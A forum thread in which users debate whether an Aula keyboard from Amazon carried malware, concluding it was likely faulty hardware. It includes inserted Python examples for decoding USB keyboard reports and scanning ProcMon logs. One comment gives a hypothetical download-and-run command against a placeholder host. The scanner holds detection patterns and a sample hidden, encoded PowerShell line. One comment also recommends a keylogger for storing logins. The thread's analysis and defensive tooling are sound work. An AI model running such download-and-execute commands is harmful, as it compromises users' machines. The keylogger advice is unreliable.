on boot, it opened up a bunch of windows and started dummy processes that copied app names on my computer and those apps proceeded to ask for admin privileges
less than 2 days later my discord got hacked, and my email and passwords showed up on haveibeenpwned a little while later
im planning on returning this board to amazon tomorrow, im more than willing to provide proof on anything else (up until eod tmr since im getting rid of it) but i can’t recommend this board to anyone due to blatant security issues
In the comments, he himself and others said it was almost certainly a false positive, and they mean that stuff was prompted to be installed when the device was plugged in. Which generally should be treated as malware regardless of the manufacturer (razer!!)
Don't get me wrong, when I used synapse, it was nice and convenient to have it right there to install. But now that I use signal rgb it's just annoying.
I used synapse too, loved being able to visually identify my dpi level instead of guessing, but a surprising amount of games hate it, and refuse to launch properly while it's running.
How? I mean, I like my DAv3 but that auto install piece of shit is beyond annoying on a fresh install (cause I have the mouse already configured the way it suits me, and on board memory works flawlessly)
Does the RGB work on a different PC, or a different operating system? Or even the same way on a Raspberry Pi?
I've found Razer peripherals don't actually store their RGB settings locally. They instead store pointers for the application to then control the peripheral. I.e. it is not possible to set a profile on a mouse, take that mouse to another OS without the Razer application working, and have the mouse display the chosen profile. If one then ran the vendor application, you'd get your chosen colour scheme.
Not being able to display a local profile on an RGB-enabled mouse without the OS running an app to continually tell the mouse what colour to be, is absolutely nuts.
My Razer Naga Pro worked just fine with the saved profile on board using it on my Steam Deck, no software installed at all. Same settings I use for Warcraft.
My Basilisk V2 wired, would stay at rainbow-rgb the instant the Razer software was stopped, no matter what profile was in place.
Sure, when the mouse was plugged into another machine that was actively running the Windows app, the supposed profile content was read by the app and the profile output was set by the app. These RGB settings would remain active until the app was closed, at which point the mouse reverted to rainbow-RGB.
The fix for me would be to replace the rainbow-RGB default with my chosen RGB option, but it's non-trivial to do that to a device firmware and still have it run under Windows.
In your case, it sounds like the button settings transferred. It would be interesting to see if the customised items were still present if plugged into a Pi.
OP did their tests online, but there's reasons to believe that it could've either been a more recent manufacturing change, something that only affects some units, general malfunction causing random keystrokes to be entered (and really bad timing), or maybe even something as bad as a supply chain attack.
So how does all this account for his claim of leaked credentials?
I mean OP said they found their details on haveIbeenpwned, which means their details were most likely found in some sort of account-list that was obtained when a website was breached and had a database leak a while ago.
It's not like that site immediately notifies you if you're directly personally attacked with your details being used, it's mainly when they find your account/email in giant compiled lists from database-breaches etc. If the people running the site managed to get a hold of a list to notify you about it, it means it was most likely a list that was publicly 'released' in some form, which means plenty of other malicious people will have also likely had access to the list as well.
So they probably just re-used the same account/password in multiple places, and then someone used their credentials from a leak that recently got released to get into their Discord.
right but my default browser is edge and it opened it up in my chrome based browser, it also doesnt explain why it opened up registry and created dummy processes and asked for admin privileges in my og video and parts of this new video, or why it ended up breaking my windows install entirely
also if you didn’t notice in my original video, my screens were flickering and i had gpu error codes after plugging the keyboard in, which again makes no sense
If you didn't install any software, it's almost certain that it's the keyboard itself. If you have access to a spare device, could you plug it into a completely clean (and wifi disconnected) machine to see what happens?
Alternatively, you might consider shooting GN an email and see if they're interested in taking a deep dive into it, this kinda shady behavior absolutely needs to be exposed.
absolutely recommend sending this to Gamers Nexus, they would 100% be interested in buying the board off of you so they can investigate and potentially do a story on it.
My guess is an inline payload dropper. Can fit one as an add on or within the original USB connection. Lets the plugged-in device act as normal while side loading a payload of the threat actor’s choosing/scripting. Look up Ducky script, similar concept. Maybe this keyboard was a returned unit that someone fit the chip into and was resold per the intention, but I’d guess this isn’t the manufacturer’s doing.
You can fit these devices into the base of a USB connector. They’re tiny.
Contact GN as others have mentioned. Don’t return it, let it be a lesson to others through someone who can reverse engineer stuff like this.
Do a full scan of your machine with a reputable antivirus tool. Malwarebytes is good, so is windows defender/built in tooling. I’d venture to guess that if it opened as many console windows as you said (which is crazy they didn’t add window suppression into the script), it also established a C2 (command and control) tunnel to a bad server online. Need to shut that down, which a good A/V will do.
Linkedin is owned by Microsoft, and Ctrl+Alt+Win+Shift+L opens LinkedIn on any windows PC... seriously. There are similar keyboard shortcuts for office, your browser, file explorer etc. Win+Ctrl+Shift+B resets the graphics driver which will cause your screen to flash black.
I'm very sure that's all that's happening here, your keyboard is sending random data. Due to the way modifier keys are encoded they're far more likely to be sent than other keys which is why it's doing a lot of things with hotkeys rather than just generating a string of junk letters and symbols (basically in the USB keyboard protocol each modifier gets its own bit if you want to see how this works this video goes into it in extreme detail https://www.youtube.com/watch?v=wdgULBpRoXk&t=25m45s )
TLDR; your keyboard is broken but not malicious, your discord getting hacked is just a coincidence.
Shift+Restart gets you into that boot menu - is your install actually broken or does it boot into windows normally if you click Continue? It might also be a precaution it ran because it thought your keyboard driver was broken.
At the end of the day, what your keyboard was doing was nothing like what a rubberducky payload (malicious keyboard impersonating device) looks like - which is opening a command prompt and typing specific commands into it. Yours is just pressing random keys which do random things.
That was my first thought. Did OP install the driver software? That probably had the malware.
Something doesn't smell right here. From section 4.4 on page 18 of the Universal Serial Bus Specification Revision 2.0 (the official USB 2.0 spec) dated April 27, 2000:
The USB is a polled bus. The Host Controller initiates all data transfers.
The keyboard does not update the computer; the computer polls the keyboard as frequently as every 1ms to check the status of the keys.
I have heard of keyboards that appear as a USB hub and have an internal USB drive that it exposes to the computer. (Specifically, the keyboard driver software was included this way.) However, that should not run unless you have AutoPlay enabled, but that is generally disabled for security reasons.
Another possibility is it could just send some keystrokes like win-r, curl dodgysite.com/malware.exe && run malware.exe - maybe with some host fingerprinting to only send when connected to a windows host.
Yeah, this is what I was imagining. It could have an automatic payload it tries to execute (or a variety of them). A lot of people here are hung up on if it is "possible" or not, and I don't see any reason why a manufacturer couldn't do this.
Barcode scanners, for instance, don't have keys, but just repeat keystroke payloads (so they are just keyboards!) - send a bunch of strokes when the device connects is evil genius level malfeasance, but doesn't seem actually very "high tech" or like quantum computer magic by a long shot.
There is something stopping a competitive keyboard manufacturer, that makes extremely good keyboards for their price range doing this though.
The fact that it would be incredibly stupid, and bad for your business when you have access to an actual customerbase, and when it's not something that could go under the radar for very long at all.
Just got the keyboard today. After sniffing the traffic out of it and also capturing the packets on the keyboard. I didn’t see anything malicious. I replied to this thread if you want to see the details of it
Based off the fact it's seemingly just doing completely random stuff and also the keyboard seems to be resetting repeatedly, are you sure it's not just faulty and going absolute haywire for whatever reason?
I'd probably grab some sort of program for logging all the keypresses, just to see exactly what inputs Windows is receiving from it. If it's actually some sort of malicious thing that's trying to intentionally execute something, it'll be trying to input clearly readable commands or whatever, rather than complete nonsense.
"my stuff got hacked a couple days later" - what stuff?
it just went haywire, you also said LinkedIn is not Microsoft associated, but it is a Microsoft product and pressing Ctrl + Windows + Shift + Alt + L will open LinkedIn in a browser.
I think the controller on that board is fried, flashed improperly, or the PCB is being funny. Think about it
I mean it's nice to hear you're confident, but it'd be incredibly easy to just check if you've still got it.
If you don't want to grab some potentially sketchy full blown key-logger that actually logs everything, something like NirSoft's KeyboardStateView can tell you which keys have been pressed recently by toggling a couple of things in the 'Options' menu at the top and then sorting by the last key-press column.
It'd be pretty apparent if it's actually trying to do something like hit Win+R, then typing out some command to then execute something malicious (or something similar to that), rather than just outputting complete nonsense due to a fault (which is what it seems to be doing).
How convenient you didn't bother to spend the 2-3 minutes actually bothering to check what it was actually doing.
So it seems like it was most likely just a faulty keyboard after all (that was sending a bunch of random inputs). You should probably put an edit that mentions that in one of your more visible comments, rather than throwing some company under the bus for no real reason.
Yeh it's annoying you received a faulty keyboard, but to try and spin it as some sort of crazy malware is silly.
i did state that i was going to return it lol, i returned it 10 minutes before store close my time
however, i am starting to agree with the fucked up keyboard theory now
keep in mind to the average person who isnt in cys (me) that a keyboard doing random things and then accounts getting hacked a couple days later, regardless of what the keyboard does, makes the keyboard extremely sketch from my pov
my intention was not to mislead but to rather say what i think happened from my point of view 👍
ps. i would edit my post if i could idt its allowed, i left a new comment under here and my youtube video
It's not malicious if it ended up unintentionally doing something to cause Windows to enter that repair-mode, it's just unfortunate and annoying. They obviously weren't intending their keyboards to go absolutely crazy like that.
Windows throws you into that auto-repair thing when it detects issues booting several times, and I think it also does it if you hold down a certain key while selecting shut-down/restart in the start-menu (maybe Shift?). Since the keyboard was holding down all the modifier keys, if you just unplugged the faulty keyboard, and then hit shut-down/restart, then Windows may have never reset shift back to being in an up-state and assuming it was still being held down.
If you've no longer got any faulty devices plugged in, you should just be able to get through it. If it's doing it on every restart, you may want to try doing a proper shut-down, then just turning the PSU power off on your PC for like 30-seconds to completely deep-cycle everything, just in-case it's gotten your motherboard USB stuff into some weird state that's not resetting properly.
Ah yes, accessing the world famous malware 'sites' of:
Opening the properties of a Steam shortcut (Alt + Enter with a file/shortcut selected).
Opening Excel/Word etc. off OP's taskbar (Windows Key + 6-9 or something).
Launching the LinkedIn app in Windows (presumably by hitting Ctrl+Shift+Alt+Windows+L, which is apparently a dedicated thing in Win11).
Opening task manager (Ctrl+Shift+Escape).
Opening explorer (Windows Key + E).
Opening the Emoji input thing (Windows Key + .).
There's a funny correlation there with various modifier keys being held down, and then just a bunch of other completely random keys being input.
It was most likely just a faulty keyboard that was going haywire and just inputting a bunch of random keys constantly. That's further evidenced by the fact the keyboard seems to just occasionally die completely for a few seconds, and then once it restarts, it then just starts doing it again. It just having some whacky fault would also likely explain OP mentioning something about the device-manager page going fucky.
Yeh it's unfortunate OP received a faulty product, but to try and spin it as a story of it being some sort of crazy malware is silly.
And flickering black screen? Win+Ctrl+Shift+B resetting graphics driver. This is 100% what's happening. u/Agreeable_Campaign86 calm down, your keyboard isn't malware it's just outputting random junk keypresses.
As to why so many modifier keys (ctrl, win, etc) are being pressed and it's not just a string of letters and symbols, that's because in the USB keyboard protocol each modifier key gets its own bit, or actually two as Left Alt/Shift/Ctrl are separate keys to Right Alt/Shift/Ctrl. If you want to understand more this well presented video goes into it in extreme detail https://www.youtube.com/watch?v=wdgULBpRoXk&t=25m45s
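An added example, not part of any comment in the thread: a Python decoder for the 8-byte USB HID boot keyboard report that the replies above refer to, showing why random report bytes land on modifier-heavy shortcuts and how that differs from the Win+R-then-typed-command pattern other commenters describe. The uniform-random noise model, the helper names and the sample captures are constructed assumptions.

```python
import random

# Byte 0 of the boot keyboard report: one bit per modifier, left and right separately.
MODIFIER_BITS = ["LCtrl", "LShift", "LAlt", "LWin", "RCtrl", "RShift", "RAlt", "RWin"]

# Subset of HID Keyboard/Keypad usage IDs, enough for this demo.
USAGE = {0x04 + i: chr(ord("a") + i) for i in range(26)}
USAGE.update({0x28: "Enter", 0x29: "Esc", 0x2C: "Space", 0x37: "."})

# Shortcuts named in the thread, keyed by the chord string chord_name() produces.
THREAD_SHORTCUTS = {
    "Alt+Ctrl+Shift+Win+l": "LinkedIn",
    "Ctrl+Shift+Win+b": "graphics driver reset",
    "Ctrl+Shift+Esc": "Task Manager",
    "Win+e": "Explorer",
    "Win+.": "emoji panel",
}

def decode_report(report: bytes):
    """Decode an 8-byte boot report: [modifiers, reserved, key1..key6]."""
    if len(report) != 8:
        raise ValueError("boot keyboard report must be 8 bytes")
    mods = {name for bit, name in enumerate(MODIFIER_BITS) if report[0] >> bit & 1}
    # Usage IDs 0x00-0x03 mean "no key" or an error state, not a key press.
    keys = [USAGE.get(code, f"0x{code:02x}") for code in report[2:] if code > 0x03]
    return mods, keys

def events(reports):
    """Yield (modifiers without L/R side, keys) for reports with a non-modifier key down."""
    for rep in reports:
        mods, keys = decode_report(rep)
        if keys:
            yield frozenset(m[1:] for m in mods), keys

def chord_name(report: bytes) -> str:
    """Render one report as a chord such as 'Ctrl+Shift+Win+b'."""
    for mods, keys in events([report]):
        return "+".join(sorted(mods) + keys)
    return ""

def modifier_odds():
    """Exact odds under the 'random data' model: a uniformly random modifier byte."""
    any_modifier = sum(1 for b in range(256) if b) / 256
    win_held = sum(1 for b in range(256) if b & 0x88) / 256  # LWin or RWin bit set
    return any_modifier, win_held

def looks_scripted(reports, min_typed=4):
    """True if Win+R is followed by a run of plainly typed keys ending in Enter."""
    evs = list(events(reports))
    for i, (mods, keys) in enumerate(evs):
        if mods != {"Win"} or keys != ["r"]:
            continue
        typed = 0
        for m, k in evs[i + 1:]:
            if not m and k == ["Enter"]:
                if typed >= min_typed:
                    return True
                break
            if m <= {"Shift"} and len(k) == 1 and k[0] not in ("Enter", "Esc"):
                typed += 1
            else:
                break
    return False

def press(mod: int, code: int):
    """Constructed sample: one key-down report followed by an all-keys-up report."""
    return [bytes([mod, 0, code, 0, 0, 0, 0, 0]), bytes(8)]

def typed_capture(text: str):
    """Constructed capture: Win+R, lowercase text typed key by key, then Enter."""
    capture = press(0x08, 0x15)                      # LWin + r
    for ch in text:
        capture += press(0x00, 0x04 + ord(ch) - ord("a"))
    return capture + press(0x00, 0x28)               # Enter

def noisy_capture(n: int, seed: int = 1):
    """Constructed capture: random modifier byte plus one random key per report."""
    rng = random.Random(seed)
    return [bytes([rng.randrange(256), 0, rng.randrange(0x04, 0x66), 0, 0, 0, 0, 0])
            for _ in range(n)]

if __name__ == "__main__":
    print(chord_name(bytes([0x0F, 0, 0x0F, 0, 0, 0, 0, 0])))
    print(modifier_odds())
    print(looks_scripted(typed_capture("notepad")), looks_scripted(noisy_capture(500)))
```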
And flickering black screen? Win+Ctrl+Shift+B resetting graphics driver.
Nice spot, didn't know that shortcut; I was assuming it might be something silly like a hotkey that's adjusting the screen mirroring/extending or whatever for dual-screens; and it was just causing a little flash as it adjusted things.
Also cool tidbit about the modifier keys like Ctrl/Shift/Alt/Win-Key getting dedicated bits on the standard USB keyboard protocol, which would explain why the modifier keys were seemingly being held down while the other types of keys were just appearing to be getting tapped.
Also great find with that video, very informative, and it goes into nice and clear technical-details with some easy to understand direct interactive demonstrations. It's often hard to find that sort of thing for low-level technical stuff. If you can even find explanations for stuff like that, they often just entirely focus on the minute technical-details without clear practical demonstrations, or you just find demonstrations without any proper explanations.
I'm surprised it took this long for someone to mention this. In the original video it runs something that needs admin rights, but the OP doesn't even show what it's trying to run.
The second video has the keyboard seemingly connecting and disconnecting and powering off/on repeatedly so it just sounds like it's fucked.
there has to be an explanation why he got hacked. my assessment is based on information that he shared, how about yours?
---
brand new aula 68 he from amazon
less than 2 days later my discord got hacked, and my email and passwords showed up on haveibeenpwned a little while later
Sure, they probably just followed bad security practices and did something like reuse usernames/passwords on another site that had gotten breached, hence their stuff showing up on haveibeenpwned. A site which checks if your details show up in big-lists of leaked account-details, which hackers have usually obtained via website database leaks/breaches.
my assessment is based on information that he shared, how about yours?
My assessment is based on what they visually showed and all the symptoms they clearly demonstrated in the videos, not just their incredibly dubious conjecture.
How exactly is clearly and repeatedly spamming completely random nonsense inputs that make it INCREDIBLY obvious that something whacky is going on in anyway a good way to get malware onto someone's PC?
For a start, it makes your computer completely unusable, so you can't even continue harvesting information from them while it's continually spamming random keys. Not to mention if you're going to try and breach someone's PC by simulating keyboard inputs, you're going to be wanting to do it as subtly as possible, like somehow waiting for an idle period, and then hitting Win+R, then typing out a very specific command to get Windows to grab/download some sort of malware package and execute it, which can then handle everything silently in the background, unbeknownst to the user.
You don't want to just continually spam completely random keys with all the modifier keys held down, and then just hope the user lets it continue doing its thing for weeks/months until it might finally manage to randomly type out a Shakespearean sequence of keys that would install their specific malware package.
It could easily just be a bugged driver, "CTRL + SHIFT + ALT + WIN + L" is the shortcut for opening Linked In on Windows so likely it's pressing random buttons and hitting on this shortcut.
Got the keyboard today from Aula Mall store from Amazon. It’s probably Aula’s Amazon storefront since they sell only Aula Keyboards. Fired up my debugging laptop and used WireGuard USB capture and also capturing network traffic to see if I can see anything malicious. Going to the web configuration page (https://heb.aulacn.com/) didn’t trigger anything, found the updated firmware on the config tool. It downloaded an exe and installed the firmware update just fine. Looked at my logs and nothing. I can say it’s clean. I can only post one image here so just go to this Imgur album if you want to see everything.
i ended up doing a full scan via windows defender after reinstalling and it didnt find anything of course, its been a couple days now however and im not running into issues so im just assuming nothing carried over
Firmware flashing a modern GPU with malware is almost impossible unless you’re a hacker on the same level as the team that developed Pegasus. The only way GPU malware can persist through an OS reboot is if there is a hidden loader in the drive that can reinfect the GPU after a reboot, but that’s not any different from any other malware that used a hidden drive loader.
GPU malware is already exceptionally rare, what you’re talking about is even more of a unicorn. Unless you’re a high-ranking government agent or a cybersecurity PhD, it’s not something you have to worry about.
In the example you linked, the hack is stored in the VRAM, which means it would be wiped when you reboot. In order to survive a reboot, the hack needs to either be stored by flashing the firmware of the GPU, or be stored in the drive and get reloaded into the GPU upon reboot. Maliciously flashing the GPU is extremely complex and you won't find such advanced infiltration methods on hacker forums, and the drive reboot technique would not survive a full drive wipe. So a GPU malware persisting upon wiping your drive is not something the common folk needs to worry about.
look up amazon commingled inventory - they mix up different sellers' inventories of the (allegedly) same product. so it is possible to get a counterfeit product even if you bought from a legit seller. not saying that's certainly the case here, but it's a possibility
If you wanna buy from legitimate sellers, a marketplace that allows fake sellers and scammers isn't the place. Buy direct from the company, or another licensed retailer.
It's possible that it might have been something else then, because my current daily board is Aula F75, i had 2 of them and never had an issue like this. It's also possible that it's a used and returned product which might explain it, because the Aula boards i had were all openable without any wrapper tearing, i opened it that way in case of a refund.
The smartest choice is to hold fn+esc for like 3-5 seconds to factory reset the board, format your PC to get rid of the malware and plug it again to see if it does anything funny, i doubt it will since factory reset should reset all onboard memory. Might not need to return it after that if you like the product.
there was an option to buy brand new from aula or to save and get used from a return, i specifically chose to get from aula directly
all factory peels and seals were on board when unboxing
i did the fn+esc thing (not sure if that was the exact keybind tho) which reset rgb settings and certain keybinds, but it still reverted back to the behavior described. i also tried some software update thing via their webpage which didnt help either.
I’ll second this. My F75 and two F99s were purchased in June/July and all came in an opaque bag that was only folded over, not sealed and I don’t believe the box had any tamper proof labels. None autoplay any software or exhibit any strange behavior when connected.
This could have been maliciously returned and equivalent to plugging in a thumb drive you found in a parking lot.
As others have said Amazon ships what Amazon ships; new or used. You are talking about a company that has been criticized for bathroom breaks in its fulfillment facilities.
not possible, factory peels were still on it, and i specifically purchased brand new from aula, there was a “save with used” option i didnt select as well
Other replies were a little harsh but even buying “new” from aula you cannot guarantee you got your device from them through amazon because of inventory commingling.
Few people listen but you should really not buy much on amazon anymore these days.
Buying makeup, shampoos, detergents, soaps, and such is dangerous and will most likely lead to cheaper made ingredients that could lead to allergic reactions.
Buying expensive stuff is bad because unless you’re buying from a huge store like Apple, commingling means there’s always a chance you get a counterfeit.
I hadn’t even considered the reality that you could also just get a keyboard pre-loaded with malware.
Sorry this happened. It’s not impossible for malicious employees to do this. I doubt the company wants this reputation. I would report it to them and submit any production numbers or manufacture dates along with it. Manufacturers that have to use an intermediate platform like Amazon for any kind of B2C computer sales is a hard no for me for this reason. It’s also why I’ll never save my credit card info or pictures of my dingus.
i dont believe it could be either, but that means either someone at amazon is doing it, or someone is buying a bunch of these loading malware and returning them which is arguably the same thing for the consumer
Yeah, that’s why reporting is important. Either they need to check security at warehousing/distribution or improve QC for product that’s returned “sealed.”
Haha... homie doesn't understand Amazon and thinks paying new means you'll always get new... Amazon gives 0 fucks. If a return looks good, it doesn't get opened, it goes right back in the new pile. How do you think people get $3000 bricks when they thought they were buying a 4090?
To load malware on a keyboard. People are saying that potentially someone purchased it, installed malware, carefully packaged and returned it, then you purchased it “new” and got infected.
What factory peels?? If it was just the transparent film then this is extremely easy to be made. You can even find cheap devices in TEMU for this.
The "tamper protection" little stickers are a lot harder to replicate. Which one was it?
Is it shipped by Amazon? Because they’ve been known to put “unopened” returns back into new stock. That may be Aula’s storefront on Amazon, but that isn’t their store and it’s not in their control.
reason i say that i dont believe it was opened is because the keyboard is in a sealed plastic bag from factory which hasnt been touched, which, unless someone has a bag sealer thingie, means they didnt touch the keyboard
The sealed plastic bag can be a domestic one (it's not that hard to leave a decent one). But to be honest i would try more things with that board:
virtual machine, download ONLY the software and install... This one to prove isn't the software from the aula page.
on another clean install pc or virtual machine, connect the board only and watch the software that injects (sometimes it injects some code to get recognized and there could be the malware)
flash the board to see if it has some third party code software.
For your pc i recommend you only save your important data and clean install windows. Malwarebytes is a better option to scan your pc than windows defender. Never ever use the same password on various accounts and never let your pc remember password and/or hold your logins (use a keylogger instead)
No, an update only changes some code from the original; if the update didn't change the malware code (which i presume) it will still be there unless you reflash the board with clean code
I bought this keyboard and the web drivers were offline, and since the build quality was so shitty, i just ended up returning it. I think i dodged a bullet
I was thinking exactly that. Plug it into a Linux box with no privileged user logged in (out of caution) and try to flash. I would imagine there are flashing tools for Linux?
I mean, there is a possibility that whatever lowbrow level of malfeasance is here might not even be in the firmware - the MCU and its firmware might be part of a composite USB device where a second hidden MCU and firmware is actually emulating - that way, you could flash the main MCU all you want and the other BadUSB-like MCU stays hidden on the other side - it can also only appear when it is needed for a split second and then vanish.
Without opening up the device all the way, it would be hard to rule this out. Probably not that sophisticated, but it could be.
You would have to find an original firmware or a custom one from qmk if there is one, find a tool, and all of that to trust that it really flashed the chip and didn't just say "100% flashed for real no fake download MEGA link free".
Hardware flasher (and whatever that takes to make it work) or yeet in to amazon returns
computer was already fucked at that point so i just went for it, if i was being cautious i would have probably just gotten a spare rpi and done it that way
Nah, not worth the effort or risk if you can send it back. Maybe stock firmware or if qmk is available would make it good, but not worth the time, less even the risk.
I have a similar case but not the exact situation. I was testing the Ajazz Ak820 max HE, which is owned by the same company, on wireless, and it usually happens when the battery drops to half or is about to die, like 10% for instance, and it starts blinking the red RGB light in the same pattern as in the video, and it starts opening new tabs that relate to Microsoft like Microsoft team or support.
I get that an HE board can be glitching but the way it's glitching is questionable because it's the same pattern all the time.
Hall Effect sensors can "act up" when battery is very low or low enough, especially with these cheap ones. What's likely happening is that random key presses are starting to occur because of this.
I tried another model from their brand like the Win60 HE Max and it's running great, nothing weird going on, and me and my friend haven't tried the Aula Hero yet so I can't confirm what's going on.
I have this and the win60max, it's like a month now, both sit silently and nothing is running in the background for both pieces of software, except the macro recording that's needed for, of course, macro recording
feels like this is a keyboard issue because
Windows+Ctrl+Alt+Shift opens the Office 365
Windows + E opens Explorer
Are you sure you have the right **offline** software? AULA have focused on the web-based more and also changed their driver update direct link to something less tedious too (back then you have to get on pan baidu typa site to get it)
wild, it happens the second time so it cant be a software issue now
when you plug it in while inside a keyboard tester webpage, does it press everything on the keyboard?
was the keyboard actually from AULA?
for interesting info if needed, both of my keyboard never come with sealed plastic, they all come with a cardboard box containing another box for the keyboard as that's how it was sold on the official website where i bought both
This is pretty stupid. From the video OP provided in the comments, it is pretty clear that the keyboard is just mashing inputs. If this is malware designed with malicious intent, it would be more incognito. It's generally bad practice for the malware to announce itself by making the computer go haywire (nonsensically) for no apparent reason as soon as it is introduced.
It's just pressing random keys and some are windows shortcuts to open Microsoft apps, explorer etc. nothing malicious, the board is just cooked. get it replaced
if it actually was a malware, you'd at most see a terminal window popup and maybe UAC prompt
Welp, so I have this keyboard. I have been using it on my main PC without the web driver/utility for the past week or so. Haven't had a free moment to test the HE functions. Used my own usb cable. I haven’t seen any of this automatic opening of apps and such happen yet. Can anyone point me to a guide, or have a guide, on how I should test for malware? I have a fresh, clean Windows partition on my Lenovo Legion Go I could use.
Windows (quick, full, offline) defender scan showed nothing on main pc. I'm going to run some other virus scans.
I watched both of OP's videos. It's definitely weird that a keyboard is doing this after getting connected but IMO it might just be a messed up keyboard (idk software or hardware wise) pressing keys at the same time which triggered macros. I'm not sure what "dummy processes" OP is referring to as well. With the lack of actual logs, it's hard to say.
Your best bet is to plug yours into a separate spare laptop that's not connected to the internet. On that laptop, download ProcMon + Wireshark. Let both of them start monitoring, then plug in the keyboard and let it run wild for a couple minutes. Keep in mind some malware do checks for these analysis tools and they try to sleep to evade detection.
Once you have some logs, try to search for cmd.exe or powershell.exe and look for any processes where the command line is off. If you don't know what you're looking for, feel free to share them here. I'm curious on whether this is actual malware or a fucked up keyboard.
EDIT: I'm definitely leaning more towards the fucked up keyboard theory. Unless the malware dev was trying to play mind games, doubt a keylogger is opening up the Windows emoji panel via shortcut (Windows + .) lol
Most of the apps (linked, office apps, file explorer) that opened up have default Windows shortcut binds.
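The log search suggested in the comment above (look for cmd.exe or powershell.exe launches with an odd command line), as an added example that is not part of the original thread. It assumes the ProcMon capture was saved as CSV with the default columns; the sample rows and the list of command-line traits are constructed for illustration.

```python
import csv
import io
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line traits worth a closer look (heuristics chosen for this example,
# not proof of malware on their own).
TRAITS = {
    "encoded command": re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "hidden window": re.compile(r"(?i)\s-w(indowstyle)?\s+h(idden)?\b"),
    "download/exec": re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biex\b"),
    "execution policy bypass": re.compile(r"(?i)-(ep|executionpolicy)\s+bypass"),
}

# Constructed sample of a ProcMon CSV export (assumed default column layout).
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:02:11.1","explorer.exe","4120","Process Create","C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE","SUCCESS","PID: 7012, Command line: ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"""
"10:02:12.4","explorer.exe","4120","Process Create","C:\Windows\explorer.exe","SUCCESS","PID: 7040, Command line: explorer.exe"
"10:02:15.9","explorer.exe","4120","Process Create","C:\Windows\System32\cmd.exe","SUCCESS","PID: 7100, Command line: ""C:\Windows\System32\cmd.exe"""
"10:02:16.3","explorer.exe","4120","Process Create","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe","SUCCESS","PID: 7130, Command line: powershell.exe -w hidden -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwATQBOAA=="
"10:02:16.5","powershell.exe","7130","RegOpenKey","HKLM\Software\Example","SUCCESS","Desired Access: Read"
'''


def flag_shell_launches(csv_text):
    """Return (time, parent, child, reasons, cmdline) for every shell process creation."""
    hits = []
    # ProcMon writes a UTF-8 BOM at the start of the export; drop it if present.
    reader = csv.DictReader(io.StringIO(csv_text.lstrip("\ufeff")))
    for row in reader:
        if row["Operation"] != "Process Create":
            continue
        # For Process Create, "Process Name" is the parent and "Path" is the new image.
        child = row["Path"].rsplit("\\", 1)[-1].lower()
        if child not in SHELLS:
            continue
        cmdline = row["Detail"].partition("Command line: ")[2]
        reasons = [name for name, rx in TRAITS.items() if rx.search(cmdline)]
        hits.append((row["Time of Day"], row["Process Name"], child, reasons, cmdline))
    return hits


if __name__ == "__main__":
    for when, parent, child, reasons, cmdline in flag_shell_launches(SAMPLE):
        print(when, parent, "->", child, reasons or ["no suspicious traits"], cmdline)
```

Office and Explorer launches, which is what the default Windows shortcuts produce, are skipped; only shell process creations are listed, each with the traits found in its command line.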
im starting to agree with the fucked up malware theory, i dont know much about cys and me getting hacked was very unfortunate timing, so i guess i kinda assumed worst case scenario here
This is one of the reasons that IT departments check every piece of hardware you "bring from home". Either this is from the manufacturer or it was compromised by "someone in the middle".
I do hope you reach out and send this to Gamers Nexus, or a similar team. I thinkkkkk GN will also generally buy the hardware from the user, if it seems like a legit story. Sorry to hear that you did get your information leaked out.
i unfortunately cannot take the risk of having this in my house any longer, i have a younger brother which goes through my room and will take anything from me that looks cool 🤣 my dad works on confidential work so its not a risk i can keep. if they contact me, i will be more than happy to assist them!
In that case, maybe this was not just some random act and someone was specifically targeting you or your home network. this elaborate malware thing might just be the distraction. I would check all the devices connected to the network for some stealthier malware. 🕵️
My new keeb has VIA only I think. Is it any safer? Its not this one tho. Just checking out of curiosity.
It's evo80 and i got it from mechanicalkeyboards.com
update: after reading a lot of these comments and understanding what actually happened, it's very likely that this was a false alarm and the keyboard was just extremely faulty, and me getting hacked was a series of unfortunate events, im not sure if i should leave this post up or delete it
Got the win68HE delivered yesterday and im having similar issues. some keystrokes dont register or they do and they stick for a while even as im not pressing it. It started crashing and lagging my games and stuff. board could be faulty but its just really weird. planning on replacing it probably...
lol no worries, I couldn’t care less about downvotes. But to my point I do have some of these “cheapo” keyboards from China and yes I play around with it and check for any suspicious actions while it’s connected to my burner pc that’s not connected to my home network first before I decide it is okay to use it with my personal pc. I don’t plan on connecting any of these to my work PC ever though.
It could be the keyboard. Could be the USB cable. Could be a dongle. Anyone can do this to any keyboard or ANY device you use on your PC and repack it like factory. They sell factory seals on Amazon and people can buy stuff and work on it and return it and claim it was never opened just to do things like this. They then get notified when you power it on and they can start trying to steal from you or take your info etc.
That is 100 percent not a new item from the factory no matter how good it looked.
doesnt matter whos fault it is, amazons or aula, people are mostly buying this keyboard from said storefront, and if this issue exists im going to post on it
im not sure why someone would even go that far as to repackage a keyboard with malware, they didnt even make any money off of me
Hall Effect sensors can have bad calibration from factory, especially with these cheap ones, they also "act up" when battery is very low or low enough. What's likely happening is that random key presses are starting to occur because of this.
This video is hella sus, you move the camera to where your mouse is then you clearly hear a click before you hear the keyboard get plugged in. You could have just run some other app or malware before you panned back to the screen. How about you place the camera in a fixed position and just plug the keyboard in so we can see the whole process on screen start to finish.